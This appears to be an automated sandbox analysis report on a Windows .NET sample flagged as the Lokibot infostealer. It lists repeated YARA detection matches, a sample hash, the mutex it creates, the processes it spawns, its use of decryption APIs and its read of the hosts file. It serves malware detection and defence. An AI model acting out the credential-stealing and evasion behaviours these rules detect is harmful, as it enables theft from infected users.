              Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: hfyhigXccT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 0.2.hfyhigXccT.exe.4395410.11.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.4395410.11.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.4395410.11.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.14.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.4395410.11.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.337c0e4.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.hfyhigXccT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.437b3f0.10.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.12.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.hfyhigXccT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.3374e98.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.0.hfyhigXccT.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.435f5d0.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.hfyhigXccT.exe.32002d8.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.281633954.000000000435F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.281705492.0000000004395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000000.276578950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000000.276118609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000002.519105745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000000.277401723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000000.276972112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_00B8A27E0_2_00B8A27E
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_00B8A8490_2_00B8A849
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_00B8A6490_2_00B8A649
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_00B8A3760_2_00B8A376
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_00B8A9770_2_00B8A977
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_00B8A1490_2_00B8A149
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_00B8A5490_2_00B8A549
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_00B8A7490_2_00B8A749
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_0158C37C0_2_0158C37C
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_0158E2F00_2_0158E2F0
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_0158E2E00_2_0158E2E0
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_05A6B6F00_2_05A6B6F0
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_05A69F660_2_05A69F66
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_05A69F740_2_05A69F74
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_076493180_2_07649318
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 0_2_0764D1C80_2_0764D1C8
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 4_2_0041A8494_2_0041A849
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 4_2_0041A1494_2_0041A149
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 4_2_0041A5494_2_0041A549
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 4_2_0041A9774_2_0041A977
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 4_2_0041A6494_2_0041A649
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 4_2_0041A27E4_2_0041A27E
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 4_2_0041A7494_2_0041A749
              Source: C:\Users\user\Desktop\hfyhigXccT.exeCode function: 4_2_0041A3764_2_0041A376
              Source: hfyhigXccT.exe, 00000000.00000002.280075598.00000000031F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNativeVariant.dll" vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000000.00000002.279934838.0000000003131000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloneHelper.dll4 vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000000.00000000.242761502.0000000000BFA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameConsoleModifi.exeL vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000000.00000002.283271827.0000000007620000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNativeVariant.dll" vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000000.00000002.283139056.00000000075F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCloneHelper.dll4 vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000000.00000002.280759800.0000000004139000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTweenEngineAPI.dllD vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000000.00000002.283568185.0000000007790000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTweenEngineAPI.dllD vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000004.00000000.272515723.000000000048A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameConsoleModifi.exeL vs hfyhigXccT.exe
              Source: hfyhigXccT.exe, 00000005.00000002.519673669.0000000000C9A000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenameConsoleModifi.exeL vs hfyhigXccT.exe
              Source: hfyhigXccT.exeBinary or memory string: OriginalFilenameConsoleModifi.exeL vs hfyhigXccT.exe
              Source: hfyhigXccT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: hfyhigXccT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\hfyhigXccT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\hfyhigXccT.exe "C:\Users\user\Desktop\hfyhigXccT.exe"
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess created: C:\Users\user\Desktop\hfyhigXccT.exe C:\Users\user\Desktop\hfyhigXccT.exe
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess created: C:\Users\user\Desktop\hfyhigXccT.exe C:\Users\user\Desktop\hfyhigXccT.exe
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess created: C:\Users\user\Desktop\hfyhigXccT.exe C:\Users\user\Desktop\hfyhigXccT.exeJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeProcess created: C:\Users\user\Desktop\hfyhigXccT.exe C:\Users\user\Desktop\hfyhigXccT.exeJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hfyhigXccT.exe.logJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@34/2
              Source: hfyhigXccT.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\hfyhigXccT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\Desktop\hfyhigXccT.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: hfyhigXccT.exe, Main.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 0.0.hfyhigXccT.exe.b80000.0.unpack, Main.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 0.2.hfyhigXccT.exe.b80000.0.unpack, Main.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 4.2.hfyhigXccT.exe.410000.0.unpack, Main.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 4.0.hfyhigXccT.exe.410000.1.unpack, Main.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 4.0.hfyhigXccT.exe.410000.2.unpack, Main.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: C:\Users\user\Desktop\hfyhigXccT.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
